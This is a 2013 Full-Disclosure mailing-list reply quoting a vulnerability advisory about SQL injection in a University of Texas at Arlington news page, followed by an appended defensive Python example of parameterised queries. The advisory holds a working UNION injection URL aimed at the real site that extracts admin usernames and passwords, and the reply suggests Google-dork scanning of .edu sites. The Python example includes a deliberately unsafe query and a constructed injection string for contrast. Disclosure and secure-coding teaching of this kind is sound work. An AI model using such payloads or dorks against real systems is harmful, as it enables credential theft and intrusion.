Message-ID: <CAPMrQTR1z=quibsWXwPWY+oNgB0OMNGOm=GPDCHRGSK3i8w7Xg@mail.gmail.com>
Date: Thu, 29 Aug 2013 22:04:21 +0300
From: Julius Kivimäki <julius.kivimaki@...il.com>
To: Vulnerability Lab <research@...nerability-lab.com>
Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Re: UTA EDU University ENG - SQL Injection Vulnerability

If you're going to start posting this shit, I suggest you visit
http://www.exploit-db.com/google-dorks/ and try appending site:edu to all
of them.

2013/8/29 Vulnerability Lab <research@...nerability-lab.com>
> Title:
> ======
> UTA EDU University ENG - SQL Injection Vulnerability
>
>
> Date:
> =====
> 2013-08-28
>
>
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=256
>
>
> VL-ID:
> =====
> 256
>
>
> Common Vulnerability Scoring System:
> ====================================
> 8.4
>
>
> Introduction:
> =============
> The University of Texas at Arlington's College of Engineering provides one
> of the most comprehensive engineering programs in
> North Texas and the nation, with eight baccalaureate programs, 13 master's
> and 9 doctorates. It is the fourth largest engineering
> college in Texas, with about 3,900 students.
>
> (Copy of the Homepage: http://www.uta.edu )
>
>
> Abstract:
> =========
> The Vulnerability Laboratory Research Team discovered a SQL Injection web
> vulnerability in the famous Arlington Engineering University in Texas.
>
>
> Report-Timeline:
> ================
> 2011-12-26: Researcher Notification & Coordination (Chokri Ben Achour)
> 2012-11-27: Vendor Notification (Support Team)
> 2012-**-**: Vendor Response/Feedback (Support Team)
> 2013-08-22: Vendor Fix/Patch (No Response, verify by Check)
> 2013-08-28: Public Disclosure (Vulnerability Laboratory)
>
>
>
> Status:
> ========
> Published
>
>
> Exploitation-Technique:
> =======================
> Remote
>
>
> Severity:
> =========
> Critical
>
>
> Details:
> ========
> A critical SQL Injection web vulnerability is detected in the famous
> Arlington Engineering University in Texas.
> The vulnerability allows remote attackers to inject or execute own sql
> commands to compromise the web-application or web-server dbms.
>
> The vulnerability is located in the engineeringnews module when processing
> to request ID parameter with own SQL commands.
> Remote attackers are able to inject the commands to compromise the
> web-application and affected database management system.
> The flaw is the result of the wrong validation of the id value when processing
> to load the engineeringnews.php file.
>
>
> Vulnerable Module(s):
> [+] ../engineeringnews/
>
> Vulnerable File(s):
> [+] engineeringnews.php
>
> Vulnerable Parameter(s):
> [+] id
>
>
> Proof of Concept:
> =================
> The remote sql injection vulnerability can be exploited by remote
> attackers without user interaction or privileged user account.
> For demonstration or reproduce ...
>
> PoC:
> http://www.uta.edu/engineering/engineeringnews/engineeringnews.php?id=
>
> -1337+union+select+1,2,3,concat_ws(0x3a3a,id,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adlogin+limit+0,1--
>
>
> Solution:
> =========
> 2013-08-22: Vendor Fix/Patch (No Response, verify by Check)
>
>
> Risk:
> =====
> The security risk of the remote sql injection web vulnerability is
> estimated as critical.
>
>
> Credits:
> ========
> Vulnerability Laboratory [Research Team] - Chokri Ben Achour (
> chokri@...lution-sec.com)
>
>
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability
> and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including
> direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers
> have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation
> may not apply. We do not approve or encourage anybody to break any vendor
> licenses, policies, deface websites, hack into databases
> or trade with fraud/stolen material.
>
> Domains: www.vulnerability-lab.com - www.vuln-lab.com
> - www.evolution-sec.com
> Contact: admin@...nerability-lab.com -
> research@...nerability-lab.com - admin@...lution-sec.com
> Section: www.vulnerability-lab.com/dev -
> forum.vulnerability-db.com -
> magazine.vulnerability-db.com
> Social: twitter.com/#!/vuln_lab -
> facebook.com/VulnerabilityLab -
> youtube.com/user/vulnerability0lab
> Feeds: vulnerability-lab.com/rss/rss.php -
> vulnerability-lab.com/rss/rss_upcoming.php -
> vulnerability-lab.com/rss/rss_news.php
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory.
> Permission to electronically redistribute this alert in its unmodified
> form is granted. All other rights, including the use of other
> media, are reserved by Vulnerability-Lab Research Team or its suppliers.
> All pictures, texts, advisories, source code, videos and
> other information on this website is trademark of vulnerability-lab team &
> the specific authors or managers. To record, list (feed),
> modify, use or edit our material contact (admin@...nerability-lab.com or
> research@...nerability-lab.com) to get a permission.
>
> Copyright © 2013 | Vulnerability
> Laboratory [Evolution Security]
>
>
>
>
>
>
>
> --
> VULNERABILITY LABORATORY RESEARCH TEAM
> DOMAIN: www.vulnerability-lab.com
> CONTACT: research@...nerability-lab.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
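
Added example (not part of either message, and not the site's code): the quoted advisory blames missing validation of the id value, so this sketch contrasts a query built by string concatenation with one that allow-lists the id and binds it as a parameter. It uses Python with an in-memory SQLite database; the news table, the sample rows and all function names are assumptions, and only the adlogin table name and its columns come from the advisory.

```python
import re
import sqlite3

# Constructed hostile input, shaped like the advisory's UNION pattern.
HOSTILE = "-1 UNION SELECT id, username || '::' || password FROM adlogin"

def make_db():
    """Constructed stand-in database; the news schema is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE adlogin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Constructed headline');
        INSERT INTO adlogin VALUES (1, 'admin', 'constructed-hash');
    """)
    return db

def get_news_unsafe(db, raw_id):
    # Flawed pattern: the request value becomes part of the statement text,
    # so the database parses it as SQL instead of treating it as a value.
    return db.execute("SELECT id, title FROM news WHERE id = " + raw_id).fetchall()

def get_news_bound(db, raw_id):
    # Parameter binding alone: the whole string is compared as one value,
    # so it can never add clauses to the statement.
    return db.execute("SELECT id, title FROM news WHERE id = ?", (raw_id,)).fetchall()

def get_news_safe(db, raw_id):
    # Defence in depth: allow-list the expected shape first, then bind.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a decimal integer")
    return get_news_bound(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    print("unsafe, hostile id:", get_news_unsafe(db, HOSTILE))
    print("bound,  hostile id:", get_news_bound(db, HOSTILE))
    print("safe,   normal id: ", get_news_safe(db, "1"))
    try:
        get_news_safe(db, HOSTILE)
    except ValueError as exc:
        print("safe,   hostile id: rejected:", exc)
```

Storing password hashes with a slow, salted algorithm and giving the web application's database account no read access to credential tables limits the damage if a query of the first kind slips through.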